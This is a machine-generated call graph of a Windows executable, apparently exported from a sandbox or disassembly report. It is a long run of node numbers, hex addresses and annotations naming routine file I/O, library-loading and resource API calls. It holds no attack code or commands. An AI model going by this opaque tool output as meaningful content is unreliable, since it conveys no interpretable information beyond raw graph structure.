e3c618 99220->99221 99222 dc9997 84 API calls 99221->99222 99246 e3c626 99222->99246 99223 dc7d2c 59 API calls 99223->99246 99224 e3c80f 99225 e3c83c Mailbox 99224->99225 99312 dc9b9c 59 API calls Mailbox 99224->99312 99225->99194 99227 e3c7f6 99229 dc7e0b 59 API calls 99227->99229 99228 dc81a7 59 API calls 99228->99246 99231 e3c803 99229->99231 99230 e3c811 99233 dc7e0b 59 API calls 99230->99233 99235 dc7c8e 59 API calls 99231->99235 99232 dc7a84 59 API calls 99232->99246 99236 e3c820 99233->99236 99234 dc7faf 59 API calls 99238 e3c6bd CharUpperBuffW 99234->99238 99235->99224 99239 dc7c8e 59 API calls 99236->99239 99237 dc7faf 59 API calls 99240 e3c77d CharUpperBuffW 99237->99240 99310 dc859a 68 API calls 99238->99310 99239->99224 99311 dcc707 69 API calls 2 library calls 99240->99311 99243 dc9997 84 API calls 99243->99246 99244 dc7e0b 59 API calls 99244->99246 99245 dc7c8e 59 API calls 99245->99246 99246->99223 99246->99224 99246->99225 99246->99227 99246->99228 99246->99230 99246->99232 99246->99234 99246->99237 99246->99243 99246->99244 99246->99245 99248 e27bec 99247->99248 99249 de0ff6 Mailbox 59 API calls 99248->99249 99250 e27bfa 99249->99250 99251 e27c08 99250->99251 99252 dc77c7 59 API calls 99250->99252 99251->99194 99252->99251 99254 e3bfc5 99253->99254 99255 e3bfab 99253->99255 99314 e3a528 59 API calls Mailbox 99254->99314 99313 e2a0b5 89 API calls 4 library calls 99255->99313 99258 e3bfd0 99259 dca000 330 API calls 99258->99259 99260 e3c031 99259->99260 99261 e3c0c3 99260->99261 99265 e3c072 99260->99265 99286 e3bfbd Mailbox 99260->99286 99262 e3c119 99261->99262 99263 e3c0c9 99261->99263 99264 dc9997 84 API calls 99262->99264 99262->99286 99335 e27ba4 59 API calls 99263->99335 99266 e3c12b 99264->99266 99315 e27581 59 API calls Mailbox 99265->99315 99268 dc7faf 59 API calls 99266->99268 99272 e3c14f CharUpperBuffW 99268->99272 99269 e3c0ec 99336 dc5ea1 59 API calls Mailbox 99269->99336 99271 e3c0a2 99316 dcf5c0 99271->99316 99276 e3c169 99272->99276 99275 e3c0f4 Mailbox 99337 dcfe40 331 API calls 2 library calls 99275->99337 99277 e3c170 99276->99277 99278 e3c1bc 99276->99278 99338 e27581 59 API calls Mailbox 99277->99338 99279 dc9997 84 API calls 99278->99279 99281 e3c1c4 99279->99281 99339 dc9fbd 60 API calls 99281->99339 99284 e3c19e 99285 dcf5c0 330 API calls 99284->99285 99285->99286 99286->99194 99287 e3c1ce 99287->99286 99288 dc9997 84 API calls 99287->99288 99289 e3c1e9 99288->99289 99340 dc5ea1 59 API calls Mailbox 99289->99340 99291 e3c1f9 99341 dcfe40 331 API calls 2 library calls 99291->99341 99293->99183 99294->99183 99295->99206 99296->99200 99297->99188 99298->99203 99299->99194 99300->99194 99301->99194 99302->99206 99303->99176 99304->99196 99305->99196 99306->99196 99307->99177 99308->99169 99309->99177 99310->99246 99311->99246 99312->99225 99313->99286 99314->99258 99315->99271 99317 dcf61a 99316->99317 99318 dcf7b0 99316->99318 99320 e04848 99317->99320 99321 dcf626 99317->99321 99319 dc7f41 59 API calls 99318->99319 99327 dcf6ec Mailbox 99319->99327 99322 e3bf80 331 API calls 99320->99322 99428 dcf3f0 331 API calls 2 library calls 99321->99428 99324 e04856 99322->99324 99328 dcf790 99324->99328 99430 e2a0b5 89 API calls 4 library calls 99324->99430 99326 dcf65d 99326->99324 99326->99327 99326->99328 99331 e23e73 3 API calls 99327->99331 99334 e3474d 331 API calls 99327->99334 99342 dc4faa 99327->99342 99348 e2cde5 99327->99348 99328->99286 99330 dcf743 99330->99328 99429 dc9df0 59 API calls Mailbox 99330->99429 99331->99330 99334->99330 99335->99269 99336->99275 99337->99286 99338->99284 99339->99287 99340->99291 99341->99286 99343 dc4fbb 99342->99343 99344 dc4fb4 99342->99344 99346 dc4fca 99343->99346 99347 dc4fdb FreeLibrary 99343->99347 99431 de55d6 99344->99431 99346->99330 99347->99346 99349 dc77c7 59 API calls 99348->99349 99350 e2ce1a 99349->99350 99351 dc77c7 59 API calls 99350->99351 99352 e2ce23 99351->99352 99353 e2ce37 99352->99353 99838 dc9c9c 59 API calls 99352->99838 99355 dc9997 84 API calls 99353->99355 99356 e2ce54 99355->99356 99357 e2ce76 99356->99357 99358 e2cf55 99356->99358 99365 e2cf85 Mailbox 99356->99365 99360 dc9997 84 API calls 99357->99360 99705 dc4f3d 99358->99705 99361 e2ce82 99360->99361 99363 dc81a7 59 API calls 99361->99363 99366 e2ce8e 99363->99366 99364 e2cf81 99364->99365 99368 dc77c7 59 API calls 99364->99368 99365->99330 99371 e2cea2 99366->99371 99372 e2ced4 99366->99372 99367 dc4f3d 136 API calls 99367->99364 99369 e2cfb6 99368->99369 99370 dc77c7 59 API calls 99369->99370 99373 e2cfbf 99370->99373 99375 dc81a7 59 API calls 99371->99375 99376 dc9997 84 API calls 99372->99376 99374 dc77c7 59 API calls 99373->99374 99377 e2cfc8 99374->99377 99378 e2ceb2 99375->99378 99379 e2cee1 99376->99379 99381 dc77c7 59 API calls 99377->99381 99382 dc7e0b 59 API calls 99378->99382 99380 dc81a7 59 API calls 99379->99380 99383 e2ceed 99380->99383 99384 e2cfd1 99381->99384 99385 e2cebc 99382->99385 99839 e24cd3 GetFileAttributesW 99383->99839 99387 dc9997 84 API calls 99384->99387 99388 dc9997 84 API calls 99385->99388 99390 e2cfde 99387->99390 99391 e2cec8 99388->99391 99389 e2cef6 99392 e2cf09 99389->99392 99395 dc7b52 59 API calls 99389->99395 99393 dc46f9 59 API calls 99390->99393 99394 dc7c8e 59 API calls 99391->99394 99397 dc9997 84 API calls 99392->99397 99403 e2cf0f 99392->99403 99396 e2cff9 99393->99396 99394->99372 99395->99392 99398 dc7b52 59 API calls 99396->99398 99399 e2cf36 99397->99399 99400 e2d008 99398->99400 99840 e23a2b 75 API calls Mailbox 99399->99840 99402 e2d03c 99400->99402 99405 dc7b52 59 API calls 99400->99405 99404 dc81a7 59 API calls 99402->99404 99403->99365 99406 e2d04a 99404->99406 99407 e2d019 99405->99407 99408 dc7c8e 59 API calls 99406->99408 99407->99402 99410 dc7d2c 59 API calls 99407->99410 99409 e2d058 99408->99409 99411 dc7c8e 59 API calls 99409->99411 99412 e2d02e 99410->99412 99414 e2d066 99411->99414 99413 dc7d2c 59 API calls 99412->99413 99413->99402 99415 dc7c8e 59 API calls 99414->99415 99416 e2d074 99415->99416 99417 dc9997 84 API calls 99416->99417 99418 e2d080 99417->99418 99729 e242ad 99418->99729 99420 e2d091 99421 e23e73 3 API calls 99420->99421 99422 e2d09b 99421->99422 99423 e2d0cc 99422->99423 99424 dc9997 84 API calls 99422->99424 99427 dc4faa 84 API calls 99423->99427 99425 e2d0b9 99424->99425 99427->99365 99428->99326 99429->99330 99430->99328 99432 de55e2 _wprintf 99431->99432 99433 de560e 99432->99433 99434 de55f6 99432->99434 99440 de5606 _wprintf 99433->99440 99444 de6e4e 99433->99444 99466 de8d68 58 API calls __getptd_noexit 99434->99466 99437 de55fb 99467 de8ff6 9 API calls __vswprintf_l 99437->99467 99440->99343 99445 de6e5e 99444->99445 99446 de6e80 EnterCriticalSection 99444->99446 99445->99446 99447 de6e66 99445->99447 99448 de5620 99446->99448 99449 de9e4b __lock 58 API calls 99447->99449 99450 de556a 99448->99450 99449->99448 99451 de558d 99450->99451 99452 de5579 99450->99452 99459 de5589 99451->99459 99469 de4c6d 99451->99469 99512 de8d68 58 API calls __getptd_noexit 99452->99512 99455 de557e 99513 de8ff6 9 API calls __vswprintf_l 99455->99513 99468 de5645 LeaveCriticalSection LeaveCriticalSection _fseek 99459->99468 99462 de55a7 99486 df0c52 99462->99486 99464 de55ad 99464->99459 99465 de2f95 _free 58 API calls 99464->99465 99465->99459 99466->99437 99467->99440 99468->99440 99470 de4c80 99469->99470 99474 de4ca4 99469->99474 99471 de4916 __flush 58 API calls 99470->99471 99470->99474 99472 de4c9d 99471->99472 99514 dedac6 99472->99514 99475 df0dc7 99474->99475 99476 de55a1 99475->99476 99477 df0dd4 99475->99477 99479 de4916 99476->99479 99477->99476 99478 de2f95 _free 58 API calls 99477->99478 99478->99476 99480 de4935 99479->99480 99481 de4920 99479->99481 99480->99462 99660 de8d68 58 API calls __getptd_noexit 99481->99660 99483 de4925 99661 de8ff6 9 API calls __vswprintf_l 99483->99661 99485 de4930 99485->99462 99487 df0c5e _wprintf 99486->99487 99488 df0c6b 99487->99488 99489 df0c82 99487->99489 99677 de8d34 58 API calls __getptd_noexit 99488->99677 99490 df0d0d 99489->99490 99492 df0c92 99489->99492 99682 de8d34 58 API calls __getptd_noexit 99490->99682 99495 df0cba 99492->99495 99496 df0cb0 99492->99496 99494 df0c70 99678 de8d68 58 API calls __getptd_noexit 99494->99678 99500 ded446 ___lock_fhandle 59 API calls 99495->99500 99679 de8d34 58 API calls __getptd_noexit 99496->99679 99497 df0cb5 99683 de8d68 58 API calls __getptd_noexit 99497->99683 99502 df0cc0 99500->99502 99504 df0cde 99502->99504 99505 df0cd3 99502->99505 99503 df0d19 99684 de8ff6 9 API calls __vswprintf_l 99503->99684 99680 de8d68 58 API calls __getptd_noexit 99504->99680 99662 df0d2d 99505->99662 99508 df0c77 _wprintf 99508->99464 99510 df0cd9 99681 df0d05 LeaveCriticalSection __unlock_fhandle 99510->99681 99512->99455 99513->99459 99515 dedad2 _wprintf 99514->99515 99516 dedadf 99515->99516 99517 dedaf6 99515->99517 99615 de8d34 58 API calls __getptd_noexit 99516->99615 99519 dedb95 99517->99519 99521 dedb0a 99517->99521 99621 de8d34 58 API calls __getptd_noexit 99519->99621 99520 dedae4 99616 de8d68 58 API calls __getptd_noexit 99520->99616 99524 dedb28 99521->99524 99525 dedb32 99521->99525 99617 de8d34 58 API calls __getptd_noexit 99524->99617 99542 ded446 99525->99542 99528 dedb2d 99622 de8d68 58 API calls __getptd_noexit 99528->99622 99529 dedb38 99531 dedb5e 99529->99531 99532 dedb4b 99529->99532 99618 de8d68 58 API calls __getptd_noexit 99531->99618 99551 dedbb5 99532->99551 99533 dedba1 99623 de8ff6 9 API calls __vswprintf_l 99533->99623 99537 dedaeb _wprintf 99537->99474 99538 dedb57 99620 dedb8d LeaveCriticalSection __unlock_fhandle 99538->99620 99539 dedb63 99619 de8d34 58 API calls __getptd_noexit 99539->99619 99543 ded452 _wprintf 99542->99543 99544 ded4a1 EnterCriticalSection 99543->99544 99545 de9e4b __lock 58 API calls 99543->99545 99547 ded4c7 _wprintf 99544->99547 99546 ded477 99545->99546 99548 ded48f 99546->99548 99624 dea06b InitializeCriticalSectionAndSpinCount 99546->99624 99547->99529 99625 ded4cb LeaveCriticalSection _doexit 99548->99625 99552 dedbc2 __write_nolock 99551->99552 99553 dedc20 99552->99553 99554 dedc01 99552->99554 99582 dedbf6 99552->99582 99558 dedc78 99553->99558 99559 dedc5c 99553->99559 99635 de8d34 58 API calls __getptd_noexit 99554->99635 99557 dedc06 99636 de8d68 58 API calls __getptd_noexit 99557->99636 99562 dedc91 99558->99562 99641 df1b11 60 API calls 3 library calls 99558->99641 99638 de8d34 58 API calls __getptd_noexit 99559->99638 99560 dee416 99560->99538 99626 df5ebb 99562->99626 99564 dedc0d 99637 de8ff6 9 API calls __vswprintf_l 99564->99637 99567 dedc61 99639 de8d68 58 API calls __getptd_noexit 99567->99639 99569 dedc9f 99571 dedff8 99569->99571 99642 de9bec 58 API calls 2 library calls 99569->99642 99573 dee38b WriteFile 99571->99573 99574 dee016 99571->99574 99572 dedc68 99640 de8ff6 9 API calls __vswprintf_l 99572->99640 99577 dedfeb GetLastError 99573->99577 99584 dedfb8 99573->99584 99578 dee13a 99574->99578 99587 dee02c 99574->99587 99577->99584 99588 dee145 99578->99588 99592 dee22f 99578->99592 99579 dedccb GetConsoleMode 99579->99571 99581 dedd0a 99579->99581 99580 dee3c4 99580->99582 99647 de8d68 58 API calls __getptd_noexit 99580->99647 99581->99571 99585 dedd1a GetConsoleCP 99581->99585 99649 dec836 99582->99649 99584->99580 99584->99582 99591 dee118 99584->99591 99585->99580 99613 dedd49 99585->99613 99586 dee09b WriteFile 99586->99577 99589 dee0d8 99586->99589 99587->99580 99587->99586 99588->99580 99593 dee1aa WriteFile 99588->99593 99589->99587 99606 dee0fc 99589->99606 99590 dee3f2 99648 de8d34 58 API calls __getptd_noexit 99590->99648 99595 dee3bb 99591->99595 99596 dee123 99591->99596 99592->99580 99597 dee2a4 WideCharToMultiByte 99592->99597 99593->99577 99599 dee1f9 99593->99599 99646 de8d47 58 API calls 3 library calls 99595->99646 99644 de8d68 58 API calls __getptd_noexit 99596->99644 99597->99577 99598 dee2eb 99597->99598 99598->99584 99598->99592 99602 dee2f3 WriteFile 99598->99602 99598->99606 99599->99584 99599->99588 99599->99606 99602->99598 99605 dee346 GetLastError 99602->99605 99603 dee128 99645 de8d34 58 API calls __getptd_noexit 99603->99645 99605->99598 99606->99584 99608 df650a 60 API calls __write_nolock 99608->99613 99609 df7cae WriteConsoleW CreateFileW __putwch_nolock 99612 dede9f 99609->99612 99610 dede32 WideCharToMultiByte 99610->99584 99611 dede6d WriteFile 99610->99611 99611->99577 99611->99612 99612->99577 99612->99584 99612->99609 99612->99613 99614 dedec7 WriteFile 99612->99614 99613->99584 99613->99608 99613->99610 99613->99612 99643 de3835 58 API calls __isleadbyte_l 99613->99643 99614->99577 99614->99612 99615->99520 99616->99537 99617->99528 99618->99539 99619->99538 99620->99537 99621->99528 99622->99533 99623->99537 99624->99548 99625->99544 99627 df5ec6 99626->99627 99628 df5ed3 99626->99628 99656 de8d68 58 API calls __getptd_noexit 99627->99656 99631 df5edf 99628->99631 99657 de8d68 58 API calls __getptd_noexit 99628->99657 99630 df5ecb 99630->99569 99631->99569 99633 df5f00 99658 de8ff6 9 API calls __vswprintf_l 99633->99658 99635->99557 99636->99564 99637->99582 99638->99567 99639->99572 99640->99582 99641->99562 99642->99579 99643->99613 99644->99603 99645->99582 99646->99582 99647->99590 99648->99582 99650 dec83e 99649->99650 99651 dec840 IsProcessorFeaturePresent 99649->99651 99650->99560 99653 df5b5a 99651->99653 99659 df5b09 5 API calls ___raise_securityfailure 99653->99659 99655 df5c3d 99655->99560 99656->99630 99657->99633 99658->99630 99659->99655 99660->99483 99661->99485 99685 ded703 99662->99685 99664 df0d91 99698 ded67d 59 API calls 2 library calls 99664->99698 99666 df0d3b 99666->99664 99668 ded703 __chsize_nolock 58 API calls 99666->99668 99676 df0d6f 99666->99676 99667 ded703 __chsize_nolock 58 API calls 99669 df0d7b FindCloseChangeNotification 99667->99669 99672 df0d66 99668->99672 99669->99664 99673 df0d87 GetLastError 99669->99673 99670 df0d99 99671 df0dbb 99670->99671 99699 de8d47 58 API calls 3 library calls 99670->99699 99671->99510 99675 ded703 __chsize_nolock 58 API calls 99672->99675 99673->99664 99675->99676 99676->99664 99676->99667 99677->99494 99678->99508 99679->99497 99680->99510 99681->99508 99682->99497 99683->99503 99684->99508 99686 ded70e 99685->99686 99687 ded723 99685->99687 99700 de8d34 58 API calls __getptd_noexit 99686->99700 99693 ded748 99687->99693 99702 de8d34 58 API calls __getptd_noexit 99687->99702 99690 ded713 99701 de8d68 58 API calls __getptd_noexit 99690->99701 99691 ded752 99703 de8d68 58 API calls __getptd_noexit 99691->99703 99693->99666 99695 ded71b 99695->99666 99696 ded75a 99704 de8ff6 9 API calls __vswprintf_l 99696->99704 99698->99670 99699->99671 99700->99690 99701->99695 99702->99691 99703->99696 99704->99695 99841 dc4d13 99705->99841 99710 dfdd0f 99713 dc4faa 84 API calls 99710->99713 99711 dc4f68 LoadLibraryExW 99851 dc4cc8 99711->99851 99715 dfdd16 99713->99715 99717 dc4cc8 3 API calls 99715->99717 99719 dfdd1e 99717->99719 99718 dc4f8f 99718->99719 99720 dc4f9b 99718->99720 99877 dc506b 99719->99877 99722 dc4faa 84 API calls 99720->99722 99724 dc4fa0 99722->99724 99724->99364 99724->99367 99726 dfdd45 99885 dc5027 99726->99885 99730 e242c9 99729->99730 99731 e242ce 99730->99731 99732 e242dc 99730->99732 99733 dc81a7 59 API calls 99731->99733 99734 dc77c7 59 API calls 99732->99734 99782 e242d7 Mailbox 99733->99782 99735 e242e4 99734->99735 99736 dc77c7 59 API calls 99735->99736 99737 e242ec 99736->99737 99738 dc77c7 59 API calls 99737->99738 99739 e242f7 99738->99739 99740 dc77c7 59 API calls 99739->99740 99782->99420 99838->99353 99839->99389 99840->99403 99890 dc4d61 99841->99890 99844 dc4d3a 99845 dc4d4a FreeLibrary 99844->99845 99846 dc4d53 99844->99846 99845->99846 99848 de548b 99846->99848 99847 dc4d61 2 API calls 99847->99844 99894 de54a0 99848->99894 99850 dc4f5c 99850->99710 99850->99711 100052 dc4d94 99851->100052 99854 dc4ced 99855 dc4cff FreeLibrary 99854->99855 99856 dc4d08 99854->99856 99855->99856 99858 dc4dd0 99856->99858 99857 dc4d94 2 API calls 99857->99854 99859 de0ff6 Mailbox 59 API calls 99858->99859 99860 dc4de5 99859->99860 99861 dc538e 59 API calls 99860->99861 99862 dc4df1 _memmove 99861->99862 99863 dc4e2c 99862->99863 99865 dc4ee9 99862->99865 99866 dc4f21 99862->99866 99864 dc5027 69 API calls 99863->99864 99874 dc4e35 99864->99874 100056 dc4fe9 CreateStreamOnHGlobal 99865->100056 100067 e29ba5 95 API calls 99866->100067 99869 dc506b 74 API calls 99869->99874 99871 dc4ec9 99871->99718 99872 dfdcd0 99873 dc5045 85 API calls 99872->99873 99875 dfdce4 99873->99875 99874->99869 99874->99871 99874->99872 100062 dc5045 99874->100062 99876 dc506b 74 API calls 99875->99876 99876->99871 99878 dc507d 99877->99878 99879 dfddf6 99877->99879 100085 de5812 99878->100085 99882 e29393 100265 e291e9 99882->100265 99884 e293a9 99884->99726 99886 dfddb9 99885->99886 99887 dc5036 99885->99887 100270 de5e90 99887->100270 99889 dc503e 99891 dc4d2e 99890->99891 99892 dc4d6a LoadLibraryA 99890->99892 99891->99844 99891->99847 99892->99891 99893 dc4d7b GetProcAddress 99892->99893 99893->99891 99897 de54ac _wprintf 99894->99897 99895 de54bf 99943 de8d68 58 API calls __getptd_noexit 99895->99943 99897->99895 99899 de54f0 99897->99899 99898 de54c4 99944 de8ff6 9 API calls __vswprintf_l 99898->99944 99913 df0738 99899->99913 99902 de54f5 99903 de54fe 99902->99903 99904 de550b 99902->99904 99945 de8d68 58 API calls __getptd_noexit 99903->99945 99906 de5535 99904->99906 99907 de5515 99904->99907 99928 df0857 99906->99928 99946 de8d68 58 API calls __getptd_noexit 99907->99946 99908 de54cf _wprintf @_EH4_CallFilterFunc@8 99908->99850 99914 df0744 _wprintf 99913->99914 99915 de9e4b __lock 58 API calls 99914->99915 99926 df0752 99915->99926 99916 df07c6 99948 df084e 99916->99948 99917 df07cd 99953 de8a5d 58 API calls 2 library calls 99917->99953 99920 df07d4 99920->99916 99954 dea06b InitializeCriticalSectionAndSpinCount 99920->99954 99921 df0843 _wprintf 99921->99902 99923 de9ed3 __mtinitlocknum 58 API calls 99923->99926 99925 df07fa EnterCriticalSection 99925->99916 99926->99916 99926->99917 99926->99923 99951 de6e8d 59 API calls __lock 99926->99951 99952 de6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99926->99952 99937 df0877 __wopenfile 99928->99937 99929 df0891 99959 de8d68 58 API calls __getptd_noexit 99929->99959 99931 df0a4c 99931->99929 99934 df0aaf 99931->99934 99932 df0896 99960 de8ff6 9 API calls __vswprintf_l 99932->99960 99956 df87f1 99934->99956 99935 de5540 99947 de5562 LeaveCriticalSection LeaveCriticalSection _fseek 99935->99947 99937->99929 99937->99931 99961 de3a0b 60 API calls 2 library calls 99937->99961 99939 df0a45 99939->99931 99962 de3a0b 60 API calls 2 library calls 99939->99962 99941 df0a64 99941->99931 99963 de3a0b 60 API calls 2 library calls 99941->99963 99943->99898 99944->99908 99945->99908 99946->99908 99947->99908 99955 de9fb5 LeaveCriticalSection 99948->99955 99950 df0855 99950->99921 99951->99926 99952->99926 99953->99920 99954->99925 99955->99950 99964 df7fd5 99956->99964 99958 df880a 99958->99935 99959->99932 99960->99935 99961->99939 99962->99941 99963->99931 99967 df7fe1 _wprintf 99964->99967 99965 df7ff7 100049 de8d68 58 API calls __getptd_noexit 99965->100049 99967->99965 99969 df802d 99967->99969 99968 df7ffc 100050 de8ff6 9 API calls __vswprintf_l 99968->100050 99975 df809e 99969->99975 99972 df8049 100051 df8072 LeaveCriticalSection __unlock_fhandle 99972->100051 99973 df8006 _wprintf 99973->99958 99976 df80be 99975->99976 99977 de471a __wsopen_nolock 58 API calls 99976->99977 99978 df80da 99977->99978 99981 df8114 99978->99981 99988 df8137 99978->99988 99998 df8211 99978->99998 99979 de9006 __invoke_watson 8 API calls 99980 df87f0 99979->99980 99982 df7fd5 __wsopen_helper 103 API calls 99980->99982 99984 de8d34 __chsize_nolock 58 API calls 99981->99984 99983 df880a 99982->99983 99983->99972 99985 df8119 99984->99985 99986 de8d68 __vswprintf_l 58 API calls 99985->99986 99987 df8126 99986->99987 99990 de8ff6 __vswprintf_l 9 API calls 99987->99990 99989 df81f5 99988->99989 99997 df81d3 99988->99997 99991 de8d34 __chsize_nolock 58 API calls 99989->99991 99992 df8130 99990->99992 99993 df81fa 99991->99993 99992->99972 99994 de8d68 __vswprintf_l 58 API calls 99993->99994 99995 df8207 99994->99995 99996 de8ff6 __vswprintf_l 9 API calls 99995->99996 99996->99998 99999 ded4d4 __alloc_osfhnd 61 API calls 99997->99999 99998->99979 100000 df82a1 99999->100000 100001 df82ce 100000->100001 100002 df82ab 100000->100002 100003 df7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100001->100003 100004 de8d34 __chsize_nolock 58 API calls 100002->100004 100013 df82f0 100003->100013 100005 df82b0 100004->100005 100007 de8d68 __vswprintf_l 58 API calls 100005->100007 100006 df836e GetFileType 100008 df83bb 100006->100008 100009 df8379 GetLastError 100006->100009 100011 df82ba 100007->100011 100021 ded76a __set_osfhnd 59 API calls 100008->100021 100012 de8d47 __dosmaperr 58 API calls 100009->100012 100010 df833c GetLastError 100014 de8d47 __dosmaperr 58 API calls 100010->100014 100015 de8d68 __vswprintf_l 58 API calls 100011->100015 100016 df83a0 CloseHandle 100012->100016 100013->100006 100013->100010 100017 df7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100013->100017 100018 df8361 100014->100018 100015->99992 100016->100018 100019 df83ae 100016->100019 100020 df8331 100017->100020 100023 de8d68 __vswprintf_l 58 API calls 100018->100023 100022 de8d68 __vswprintf_l 58 API calls 100019->100022 100020->100006 100020->100010 100026 df83d9 100021->100026 100024 df83b3 100022->100024 100023->99998 100024->100018 100025 df8594 100025->99998 100029 df8767 CloseHandle 100025->100029 100026->100025 100027 df1b11 __lseeki64_nolock 60 API calls 100026->100027 100045 df845a 100026->100045 100028 df8443 100027->100028 100032 de8d34 __chsize_nolock 58 API calls 100028->100032 100028->100045 100030 df7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100029->100030 100031 df878e 100030->100031 100033 df87c2 100031->100033 100034 df8796 GetLastError 100031->100034 100032->100045 100033->99998 100035 de8d47 __dosmaperr 58 API calls 100034->100035 100036 df87a2 100035->100036 100040 ded67d __free_osfhnd 59 API calls 100036->100040 100037 df0d2d __close_nolock 61 API calls 100037->100045 100038 df10ab 70 API calls __read_nolock 100038->100045 100039 df848c 100041 df99f2 __chsize_nolock 82 API calls 100039->100041 100039->100045 100040->100033 100041->100039 100042 df1b11 60 API calls __lseeki64_nolock 100042->100045 100043 dedac6 __write 78 API calls 100043->100045 100044 df8611 100046 df0d2d __close_nolock 61 API calls 100044->100046 100045->100025 100045->100037 100045->100038 100045->100039 100045->100042 100045->100043 100045->100044 100047 df8618 100046->100047 100048 de8d68 __vswprintf_l 58 API calls 100047->100048 100048->99998 100049->99968 100050->99973 100051->99973 100053 dc4ce1 100052->100053 100054 dc4d9d LoadLibraryA 100052->100054 100053->99854 100053->99857 100054->100053 100055 dc4dae GetProcAddress 100054->100055 100055->100053 100057 dc5020 100056->100057 100058 dc5003 FindResourceExW 100056->100058 100057->99863 100058->100057 100059 dfdd5c LoadResource 100058->100059 100059->100057 100060 dfdd71 SizeofResource 100059->100060 100060->100057 100061 dfdd85 LockResource 100060->100061 100061->100057 100063 dc5054 100062->100063 100064 dfddd4 100062->100064 100068 de5a7d 100063->100068 100066 dc5062 100066->99874 100067->99863 100069 de5a89 _wprintf 100068->100069 100070 de5a9b 100069->100070 100072 de5ac1 100069->100072 100081 de8d68 58 API calls __getptd_noexit 100070->100081 100074 de6e4e __lock_file 59 API calls 100072->100074 100073 de5aa0 100082 de8ff6 9 API calls __vswprintf_l 100073->100082 100076 de5ac7 100074->100076 100083 de59ee 83 API calls 4 library calls 100076->100083 100078 de5ad6 100084 de5af8 LeaveCriticalSection LeaveCriticalSection _fseek 100078->100084 100080 de5aab _wprintf 100080->100066 100081->100073 100082->100080 100083->100078 100084->100080 100088 de582d 100085->100088 100087 dc508e 100087->99882 100089 de5839 _wprintf 100088->100089 100090 de587c 100089->100090 100091 de5874 _wprintf 100089->100091 100093 de584f _memset 100089->100093 100092 de6e4e __lock_file 59 API calls 100090->100092 100091->100087 100095 de5882 100092->100095 100115 de8d68 58 API calls __getptd_noexit 100093->100115 100101 de564d 100095->100101 100096 de5869 100116 de8ff6 9 API calls __vswprintf_l 100096->100116 100103 de5668 _memset 100101->100103 100108 de5683 100101->100108 100102 de5673 100206 de8d68 58 API calls __getptd_noexit 100102->100206 100103->100102 100103->100108 100113 de56c3 100103->100113 100105 de5678 100207 de8ff6 9 API calls __vswprintf_l 100105->100207 100117 de58b6 LeaveCriticalSection LeaveCriticalSection _fseek 100108->100117 100109 de57d4 _memset 100209 de8d68 58 API calls __getptd_noexit 100109->100209 100111 de4916 __flush 58 API calls 100111->100113 100113->100108 100113->100109 100113->100111 100118 df10ab 100113->100118 100186 df0df7 100113->100186 100208 df0f18 58 API calls 3 library calls 100113->100208 100115->100096 100116->100091 100117->100091 100119 df10cc 100118->100119 100120 df10e3 100118->100120 100210 de8d34 58 API calls __getptd_noexit 100119->100210 100122 df181b 100120->100122 100125 df111d 100120->100125 100226 de8d34 58 API calls __getptd_noexit 100122->100226 100124 df10d1 100211 de8d68 58 API calls __getptd_noexit 100124->100211 100128 df1125 100125->100128 100134 df113c 100125->100134 100126 df1820 100227 de8d68 58 API calls __getptd_noexit 100126->100227 100212 de8d34 58 API calls __getptd_noexit 100128->100212 100131 df1131 100228 de8ff6 9 API calls __vswprintf_l 100131->100228 100132 df112a 100213 de8d68 58 API calls __getptd_noexit 100132->100213 100135 df1151 100134->100135 100138 df116b 100134->100138 100139 df1189 100134->100139 100167 df10d8 100134->100167 100214 de8d34 58 API calls __getptd_noexit 100135->100214 100138->100135 100141 df1176 100138->100141 100215 de8a5d 58 API calls 2 library calls 100139->100215 100143 df5ebb __stbuf 58 API calls 100141->100143 100142 df1199 100144 df11bc 100142->100144 100145 df11a1 100142->100145 100146 df128a 100143->100146 100218 df1b11 60 API calls 3 library calls 100144->100218 100216 de8d68 58 API calls __getptd_noexit 100145->100216 100148 df1303 ReadFile 100146->100148 100153 df12a0 GetConsoleMode 100146->100153 100151 df1325 100148->100151 100152 df17e3 GetLastError 100148->100152 100150 df11a6 100217 de8d34 58 API calls __getptd_noexit 100150->100217 100151->100152 100160 df12f5 100151->100160 100157 df12e3 100152->100157 100158 df17f0 100152->100158 100154 df12b4 100153->100154 100155 df1300 100153->100155 100154->100155 100159 df12ba ReadConsoleW 100154->100159 100155->100148 100168 df12e9 100157->100168 100219 de8d47 58 API calls 3 library calls 100157->100219 100224 de8d68 58 API calls __getptd_noexit 100158->100224 100159->100160 100162 df12dd GetLastError 100159->100162 100165 df15c7 100160->100165 100160->100168 100171 df135a 100160->100171 100162->100157 100164 df17f5 100225 de8d34 58 API calls __getptd_noexit 100164->100225 100165->100168 100173 df16cd ReadFile 100165->100173 100167->100113 100168->100167 100169 de2f95 _free 58 API calls 100168->100169 100169->100167 100172 df13c6 ReadFile 100171->100172 100178 df1447 100171->100178 100174 df13e7 GetLastError 100172->100174 100184 df13f1 100172->100184 100177 df16f0 GetLastError 100173->100177 100185 df16fe 100173->100185 100174->100184 100175 df1504 100180 df14b4 MultiByteToWideChar 100175->100180 100222 df1b11 60 API calls 3 library calls 100175->100222 100176 df14f4 100221 de8d68 58 API calls __getptd_noexit 100176->100221 100177->100185 100178->100168 100178->100175 100178->100176 100178->100180 100180->100162 100180->100168 100184->100171 100220 df1b11 60 API calls 3 library calls 100184->100220 100185->100165 100223 df1b11 60 API calls 3 library calls 100185->100223 100187 df0e02 100186->100187 100191 df0e17 100186->100191 100262 de8d68 58 API calls __getptd_noexit 100187->100262 100189 df0e07 100263 de8ff6 9 API calls __vswprintf_l 100189->100263 100193 df0e4c 100191->100193 100200 df0e12 100191->100200 100264 df6234 58 API calls __malloc_crt 100191->100264 100194 de4916 __flush 58 API calls 100193->100194 100195 df0e60 100194->100195 100229 df0f97 100195->100229 100197 df0e67 100198 de4916 __flush 58 API calls 100197->100198 100197->100200 100199 df0e8a 100198->100199 100199->100200 100201 de4916 __flush 58 API calls 100199->100201 100200->100113 100202 df0e96 100201->100202 100202->100200 100203 de4916 __flush 58 API calls 100202->100203 100204 df0ea3 100203->100204 100205 de4916 __flush 58 API calls 100204->100205 100205->100200 100206->100105 100207->100108 100208->100113 100209->100105 100210->100124 100211->100167 100212->100132 100213->100131 100214->100132 100215->100142 100216->100150 100217->100167 100218->100141 100219->100168 100220->100184 100221->100168 100222->100180 100223->100185 100224->100164 100225->100168 